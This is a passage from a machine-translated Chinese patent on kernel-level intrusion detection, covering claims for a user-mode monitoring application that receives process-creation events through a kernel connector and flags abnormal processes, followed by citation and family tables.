Under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode;
In the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
Alternatively, in the present embodiment, the storage medium may include, but is not limited to: a usb disk, a Read-Only Memory (ROM), a random access Memory (RAM, random Access Memory), a removable hard disk, a magnetic disk, or an optical disk, or other various media capable of storing program codes.
The foregoing embodiment numbers of the present application are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
The integrated units in the above embodiments may be stored in the above-described computer-readable storage medium if implemented in the form of software functional units and sold or used as separate products. Based on such understanding, the technical solution of the present application may be embodied in essence or a part contributing to the prior art or all or part of the technical solution in the form of a software product stored in a storage medium, comprising several instructions for causing one or more computer devices (which may be personal computers, servers or network devices, etc.) to perform all or part of the steps of the method described in the embodiments of the present application.
In the foregoing embodiments of the present application, the descriptions of the embodiments are emphasized, and for a portion of this disclosure that is not described in detail in this embodiment, reference is made to the related descriptions of other embodiments.
In several embodiments provided by the present application, it should be understood that the disclosed client may be implemented in other manners. The above-described embodiments of the apparatus are merely exemplary, and the division of the units, such as the division of the units, is merely a logical function division, and may be implemented in another manner, for example, multiple units or components may be combined or may be integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be through some interfaces, units or modules, or may be in electrical or other forms.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The foregoing is merely a preferred embodiment of the present application and it should be noted that modifications and adaptations to those skilled in the art may be made without departing from the principles of the present application, which are intended to be comprehended within the scope of the present application.
Claims (8)
1. A method of intrusion detection comprising:
determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
Acquiring event data of the target process through communication connection, wherein the communication connection is a connection for communication with the system kernel, and the event data is data generated by an associated event of the target process;
Determining whether the target process is an abnormal process according to the data characteristics of the event data;
before acquiring event data of the target process through the communication connection, the method further comprises: establishing the communication connection between a monitoring application and the system kernel, wherein the monitoring application is a user-state application; the obtaining the event data of the target process through the communication connection comprises the following steps: in the monitoring application, acquiring event data of the target process by calling the communication connection;
The establishing the communication connection between the monitoring application and the system kernel includes: the method comprises the steps that first indication information is sent to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing the communication connection between the monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; sending second indication information to the system kernel under the condition that a first response message of the system kernel representing that the establishment is successful is received, wherein the second indication information is used for indicating the system kernel to add the instance identifier into a target identifier set, and identifiers in the target identifier set are used for representing applications allowed to communicate with applications in the user state in the kernel state; the communication connection between the monitoring application and the system kernel is established using the connector instance upon receiving a second response message of the system kernel indicating that the joining was successful.
2. The method of claim 1, wherein after determining whether the target process is an abnormal process based on the data characteristics of the event data, the method further comprises:
and displaying prompt information of whether the target process is an abnormal process or not in the monitoring application.
3. The method of claim 1, wherein determining a target process in a system kernel comprises:
Receiving a process creation message monitored by a connector instance in the system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel;
And taking the process represented by the process identifier as the target process.
4. A method according to any one of claims 1 to 3, wherein determining whether the target process is an abnormal process based on the data characteristics of the event data comprises:
Under the condition that the event data carries a first type of command, determining that the target process belongs to a first type of abnormal process, wherein the first type of command is carried in data sent by a second terminal to a first terminal, the first terminal is a terminal where a system kernel is located, and the first type of abnormal process is created for executing the first type of command; and/or the number of the groups of groups,
And under the condition that the event data carries a second type of command, determining that the target process belongs to a second type of abnormal process, wherein the second type of command is a command input in a target window of the second terminal, the target window is a control window of the first terminal, and the second type of abnormal process is created for executing the second type of command.
5. The method of claim 4, wherein prior to determining whether the target process is an abnormal process based on the data characteristics of the event data, the method further comprises:
Comparing a process identifier carried in a process creation message monitored by the system kernel with identifiers in a target identifier set, wherein the identifiers in the target identifier set are process identifiers created by applications in the system kernel;
and under the condition that the target identifier set does not have an identifier matched with the process identifier carried in the process creation message, executing the step of determining whether the target process is an abnormal process according to the data characteristics of the event data.
6. An intrusion detection device, comprising:
The system comprises a determining unit, a judging unit and a judging unit, wherein the determining unit is used for determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
the acquisition unit is used for acquiring event data of the target process through communication connection, wherein the communication connection is a connection for communication with the system kernel, and the event data is data generated by an associated event of the target process;
The detection unit is used for determining whether the target process is an abnormal process according to the data characteristics of the event data;
A communication establishing unit configured to: before event data of the target process is acquired through communication connection, establishing communication connection between a monitoring application and the system kernel, wherein the monitoring application is a user-state application; the obtaining the event data of the target process through the communication connection comprises the following steps: in the monitoring application, acquiring event data of the target process by calling the communication connection;
The communication establishing unit is specifically configured to: the method comprises the steps that first indication information is sent to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing the communication connection between the monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; sending second indication information to the system kernel under the condition that a first response message of the system kernel representing that the establishment is successful is received, wherein the second indication information is used for indicating the system kernel to add the instance identifier into a target identifier set, and identifiers in the target identifier set are used for representing applications allowed to communicate with applications in the user state in the kernel state; the communication connection between the monitoring application and the system kernel is established using the connector instance upon receiving a second response message of the system kernel indicating that the joining was successful.
7. A storage medium comprising a stored program, wherein the program when run performs the method of any one of the preceding claims 1 to 5.
8. An electronic device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, characterized in that the processor performs the method according to any of the preceding claims 1 to 5 by means of the computer program.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010287480.XA CN111651754B (en) | 2020-04-13 | 2020-04-13 | Intrusion detection method and device, storage medium and electronic device |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010287480.XA CN111651754B (en) | 2020-04-13 | 2020-04-13 | Intrusion detection method and device, storage medium and electronic device |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN111651754A CN111651754A (en) | 2020-09-11 |
| CN111651754B true CN111651754B (en) | 2024-06-14 |
Family
ID=72352110
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202010287480.XA Active CN111651754B (en) | 2020-04-13 | 2020-04-13 | Intrusion detection method and device, storage medium and electronic device |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN111651754B (en) |
Families Citing this family (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112185175B (en) * | 2020-09-17 | 2022-02-18 | 北京中兵智航软件技术有限公司 | Method and device for processing electronic progress list |
| CN112351017B (en) * | 2020-10-28 | 2022-08-26 | 北京奇虎科技有限公司 | Transverse penetration protection method, device, equipment and storage medium |
| CN113139193A (en) * | 2021-04-23 | 2021-07-20 | 杭州安恒信息技术股份有限公司 | Rebound shell risk judgment method, device and system |
| CN113395287B (en) * | 2021-06-22 | 2022-06-28 | 杭州默安科技有限公司 | Method and system for recording network attack IP and command execution echo |
| CN114205150B (en) * | 2021-12-07 | 2024-01-23 | 北京天融信网络安全技术有限公司 | Intrusion prevention method and device for container environment, electronic equipment and storage medium |
| CN116820871A (en) * | 2022-03-22 | 2023-09-29 | 三六零数字安全科技集团有限公司 | Method, system, storage medium and computer equipment for auditing process behavior |
Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102663274A (en) * | 2012-02-07 | 2012-09-12 | 奇智软件(北京)有限公司 | Method and system for detecting remote computer-invading behavior |
| CN104008332A (en) * | 2014-04-30 | 2014-08-27 | 浪潮电子信息产业股份有限公司 | Intrusion detection system based on Android platform |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20040024864A1 (en) * | 2002-07-31 | 2004-02-05 | Porras Phillip Andrew | User, process, and application tracking in an intrusion detection system |
| CN102222194A (en) * | 2011-07-14 | 2011-10-19 | 哈尔滨工业大学 | Module and method for LINUX host computing environment safety protection |
-
2020
- 2020-04-13 CN CN202010287480.XA patent/CN111651754B/en active Active
Patent Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102663274A (en) * | 2012-02-07 | 2012-09-12 | 奇智软件(北京)有限公司 | Method and system for detecting remote computer-invading behavior |
| CN104008332A (en) * | 2014-04-30 | 2014-08-27 | 浪潮电子信息产业股份有限公司 | Intrusion detection system based on Android platform |
Also Published As
| Publication number | Publication date |
|---|---|
| CN111651754A (en) | 2020-09-11 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN111651754B (en) | Intrusion detection method and device, storage medium and electronic device | |
| CA2968201C (en) | Systems and methods for malicious code detection | |
| EP2106085B1 (en) | System and method for securing a network from zero-day vulnerability exploits | |
| CN104239786B (en) | Exempt from ROOT Initiative Defenses collocation method and device | |
| CN108664793B (en) | Method and device for detecting vulnerability | |
| CN112738071B (en) | Method and device for constructing attack chain topology | |
| CN111651757A (en) | Attack behavior monitoring method, device, equipment and storage medium | |
| CN109167781B (en) | Network attack chain identification method and device based on dynamic correlation analysis | |
| WO2014113501A1 (en) | Systems and methods for identifying and reporting application and file vulnerabilities | |
| CN105631312B (en) | The processing method and system of rogue program | |
| CN104239797B (en) | Active defense method and device | |
| CN107566401B (en) | Protection method and device for virtualized environment | |
| CN112395597A (en) | Method and device for detecting website application vulnerability attack and storage medium | |
| CN112615863A (en) | Method, device, server and storage medium for resisting attack host | |
| CN112787985B (en) | Vulnerability processing method, management equipment and gateway equipment | |
| Yamada et al. | RAT-based malicious activities detection on enterprise internal networks | |
| CN113886814A (en) | Attack detection method and related device | |
| CN111385308A (en) | Security management method, device, equipment and computer readable storage medium | |
| CN109474567B (en) | DDOS attack tracing method and device, storage medium and electronic equipment | |
| CN107517226B (en) | Alarm method and device based on wireless network intrusion | |
| US20210058414A1 (en) | Security management method and security management apparatus | |
| CN112398784B (en) | Method and device for defending vulnerability attack, storage medium and computer equipment | |
| CN114861168A (en) | Anti-escape attack behavior deception honeypot construction method | |
| TWI711939B (en) | Systems and methods for malicious code detection | |
| CN111258712B (en) | Method and system for protecting safety of virtual machine under virtual platform network isolation |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant |